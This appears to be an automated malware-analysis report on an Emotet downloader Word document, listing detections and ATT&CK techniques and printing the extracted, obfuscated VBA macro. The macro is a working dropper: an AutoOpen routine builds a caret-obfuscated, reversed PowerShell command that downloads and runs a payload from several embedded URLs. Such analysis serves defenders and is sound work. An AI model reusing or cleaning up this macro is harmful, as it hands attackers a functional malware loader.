MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, a common technique for Emotet. The macro uses Shell() calls to execute commands, including constructing a complex command line that appears to download and execute a second-stage payload from a remote server. The ClamAV detection explicitly names Emotet, further supporting the family attribution.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6887588-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6887588-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4648 bytes |
SHA-256: 45e2efadd5a5dc4db2d937cc5795a90f0a612cfa84724c104c87f027c2d8abc0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IaCwwiF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If dLukjJ > 15 Then
oAMkCS = "tWBb"
End If
If doBwr And Xbnhh Then
YiZNCb = "Hpno"
End If
If HojqU Eqv 19 Then
BYikpA = "z"
End If
If sWOFCS < RqnuHO Then
vkKXET = "pWMzTYTGadt"
End If
If MqBBf <> tWLRzQ Then
FLOjjF = "FCAB"
End If
iZdkWkNiAsK (KeyString(rEYzJYW + kkSln + 12 + 16 + 39 + crpbD + HMGQXjwU) + sKXHYzQ + IARFw + KeyString(rbGYhaa + kDIwFM + 14 + 18 + 45 + iscoB + YOBHwqGJ) + zQtfICj + RClpIz + cILMpJMXD + UOwVw + QLPJATKj + IsdaRiF)
If TTIsuu Or owKpAw Then
hcLvHw = "pVFjXrbZoYuoWQ"
End If
If SUPLi > ZQiLw Then
zFiwOk = "wCMWDN"
End If
End Sub
Attribute VB_Name = "lvLZfHUs"
Function zQtfICj()
If UEwZV And ozVwp Then
EJRhav = "wwzPmcLEo"
End If
RwQMVq = "d /V^:^O/C" + """" + "^s^e^t ^y^p^W^8=^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^}" + "^}^{^hc^t^ac^}^;" + "^k^a^er^b^;^"
If aZRiMW Or tNYkLC Then
aPtfvz = "VRSWoJwKEAuoMO"
End If
If tOtql >= XJBnP Then
wjRbAV = "XJl"
End If
If bFKjBk >= MmNqC Then
LJIjoF = "wL"
End If
If zjJYq And 13 Then
phQdR = "kQwksGk"
End If
rVsFlbXn = "D^b^w^$^ ^m^e^t" + "^I^-^e^k^ov" + "n^I^;)D^b^w^$^ ^,^" + "ZZR$(^e^l^i" + "^F^d^a^o^ln^w^o^D" + "^.I^z^K^$^{^yr^t^"
MCkpvqN = "{)^Hc^d^$^ n^i" + "^ ^Z^ZR^$(hc^a^er^" + "o^f;^'^e^x^e^.^'+^" + "Bc^k^$^+^'"
If YSrUPs And vtDVPh Then
SSYOp = "r"
End If
If fIskVE < HwAHN Then
fomvpm = "jv"
End If
zTnOY = "^\^'^+c^i^l^b^u^p^:v" + "n^e^$^=^D^b" + "^w^$^;'^3^9^5^'"
zQtfICj = RwQMVq + rVsFlbXn + MCkpvqN + zTnOY
If zElXc >= rmlMMW Then
FqjvY = "aqfmk"
End If
If MFhBjw <= 19 Then
TXzYk = "IPbATb"
End If
End Function
Function RClpIz()
nujiwCqz = "^ ^=^ ^Bc^k" + "^$;)^'@^'(t^il^p^" + "S.^'^7^h^q^" + "L^yr^j/^gr^o^." + "^i^iu^k^f^m"
If vVkXws = RSBuif Then
EkcPwo = "rKKEHKPfSI"
End If
If vECYuW > 3 Then
zKASW = "zpSZVri"
End If
If awtIc <> BpuKz Then
UhiHLb = "d"
End If
If dKLQM <= hsGhXp Then
cdWPrM = "wAEKaS"
End If
If LmAtib Or btUPQ Then
wcJnU = "ih"
End If
aQidlO = "^k^.^ar^ht^" + "a^z^a//^:^p^t^t^" + "h^@^6^ic^Wn4^p^T/^t^"
FqNSF = "en^.e^t^s^k^e^tn^" + "okv//:^p^tt^h^@" + "^F^p^d^w^s^J^Jtc/" + "^l^p.gn^in^"
RClpIz = nujiwCqz + aQidlO + FqNSF
If OIcJN < DfOUw Then
pGDMi = "uzz"
End If
If cGVawj >= AsiOwD Then
NkpOn = "diUcFhKZ"
End If
If rCriK > hjRjjW Then
WhkZm = "w"
End If
If IjRsCj And QHqonQ Then
NssHU = "Ba"
End If
If LVJNu > FPAKUc Then
PBzdDr = "ATm"
End If
End Function
Function cILMpJMXD()
If zjtZlJ And zwwRnz Then
bSJWo = "sJrTultVQYNZMC"
End If
If JzcbG Or owMuX Then
dOACl = "ooo"
End If
If zPNjZi And bvrKIM Then
NqbUvG = "O"
End If
wcpOJ = "i^ar^t^er^" + "o^h^sf^f^o^.^w" + "^w^w//^:^p^t^t^h" + "^@^9R^gCr^Y^7^"
GMXlriaSwj = "4^7/^m^oc^.^s^p" + "^ir^g^dna^s^m^ac/" + "/^:^p^t^t^" + "h^@^dN^e^K^5^6^m^h" + "^z/^moc^.r^a" + "^l^u^l^l^ecr^sb//"
If YLncO = bjScMs Then
OOVScc = "FnJYtM"
End If
If TfkpWi < 6 Then
XDzjP = "ZuR"
End If
ahloZC = "^:^p^t^t^h^'^=^Hc^d" + "^$^;^tn^e^i^" + "lC^b^e^W^." + "^t^eN^ ^tc^e^j^b^"
KMrQuZPc = "o^-^wen^=^I^z" + "^K^$^ ^l^le" + "^h^sr^e^wo^" + "p&&^f^or /^L %^"
cILMpJMXD = wcpOJ + GMXlriaSwj + ahloZC + KMrQuZPc
If Ghlhmz Xor 1 Then
vkBOj = "I"
End If
If iYWwVc <= QGiXm Then
tSkUV = "jHH"
End If
If nrWVF Or qRTvM Then
jtsXuW = "Mizw"
End If
If jQVpQi <> BJHZi Then
lsqTOr = "oPqJqofvVi"
End If
End Function
Function UOwVw()
lEGmKztW = "0 ^in (^3^8^3;^-^1" + ";^0)^d^o ^s" + "^e^t ^7^TN=!^7^TN" + "!!^y^p^W^8:~%" + "^0,1!&&^i^f"
If LwbwKf <> 17 Then
RfzDPw = "rLaiGs"
End If
jvcsfCKt = " %^0 ^l^e^q ^0 c" + "^a^l^l %^7" + "^TN:^*^7^TN^!" + "^=%" + """" + ""
UOwVw = lEGmKztW + jvcsfCKt
If WvazTG < XQCWJi Then
RvCvVn = "OVYA"
End If
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.